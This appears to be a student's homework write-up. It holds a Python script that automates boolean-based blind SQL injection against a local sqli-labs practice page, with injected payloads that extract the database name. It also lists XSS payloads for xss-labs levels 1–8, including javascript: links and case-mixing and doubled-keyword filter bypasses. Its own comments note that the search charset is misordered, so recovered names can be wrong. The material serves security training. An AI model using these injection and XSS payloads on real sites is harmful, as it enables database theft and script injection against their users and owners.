第二次作业
对自动化布尔盲注的代码进行优化:
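import requests

# Target URL: a local sqli-labs practice instance (Less-8, boolean-based blind).
# The page answers differently depending on whether the injected condition is
# true, which is the one-bit oracle this script reads. Server side, binding
# `id` as a query parameter (prepared statement) removes that oracle; in logs,
# this script shows up as a burst of near-identical requests whose `id` value
# differs only in one comparison operand.
url = "http://127.0.0.1/sqli/Less-8/index.php"

# NOTE(review): get_database_name() binary-searches this string, which is only
# valid when the characters appear in the same order the database uses for the
# `>=` comparison. This string is not in ascending code-point order (lowercase,
# then uppercase, then digits, then punctuation), so recovered names should be
# verified against the lab database before being trusted.
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "

# Text the lab page shows when the injected condition evaluates to true.
# Both probes now use the same marker (the original checked two different
# strings, "You are in..........." and "You are in").
SUCCESS_MARKER = "You are in"

# Seconds to wait for the lab server; without a timeout requests.get() can
# block forever if the local web server stalls.
REQUEST_TIMEOUT = 10


def _condition_holds(payload):
    """Send one probe and report whether the response carries the true marker.

    Raises:
        requests.RequestException: if the request fails or times out.
    """
    response = requests.get(url, params={"id": payload}, timeout=REQUEST_TIMEOUT)
    return SUCCESS_MARKER in response.text


def get_database_length():
    """Infer the length of the current database name.

    Probes candidate lengths one at a time, starting at 1.

    Returns:
        The first length for which the page shows the true marker, or 0 if
        no candidate up to the cap matched.
    """
    length = 0
    while True:
        length += 1
        payload = f"1' AND (SELECT length(database()) = {length}) -- "
        if _condition_holds(payload):
            return length
        if length > 50:  # cap the search so a non-responsive target cannot loop forever
            break
    return 0


def get_database_name(length):
    """Infer the database name one character at a time by binary search.

    Args:
        length: number of characters to recover, as returned by
            get_database_length().

    Returns:
        The recovered string. A position for which no character in `charset`
        satisfied the comparison is reported as "?" instead of silently
        wrapping around to the last charset entry.
    """
    recovered = []
    for i in range(1, length + 1):
        left, right = 0, len(charset) - 1
        while left <= right:
            mid = (left + right) // 2
            char = charset[mid]
            payload = f"1' AND (SELECT substring(database(), {i}, 1) >= '{char}') -- "
            if _condition_holds(payload):
                left = mid + 1
            else:
                right = mid - 1
        # right == -1 means every comparison was false; charset[-1] would be a
        # misleading answer (Python's negative index wraps to the last entry).
        recovered.append(charset[right] if right >= 0 else "?")
    return "".join(recovered)


# Script entry point
if __name__ == "__main__":
    length = get_database_length()
    if length > 0:
        print(f"Database length: {length}")
        db_name = get_database_name(length)
        print(f"Database name: {db_name}")
    else:
        print("Failed to determine database length.")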
xss-labs 1到8关:

第二关onclick事件的触发

第三关' onclick='alert(1)

第四关,重新插入

第五关'"> <a href="javascript:alert(1)">"'test</a>

第六关'"> <a HRef="javaSCRipt:alert(1)">"'test</a>

第七关'"> <a hrhrefef="javascrscriptipt:alert(1)">"'test</a>

第八关进行实体编码

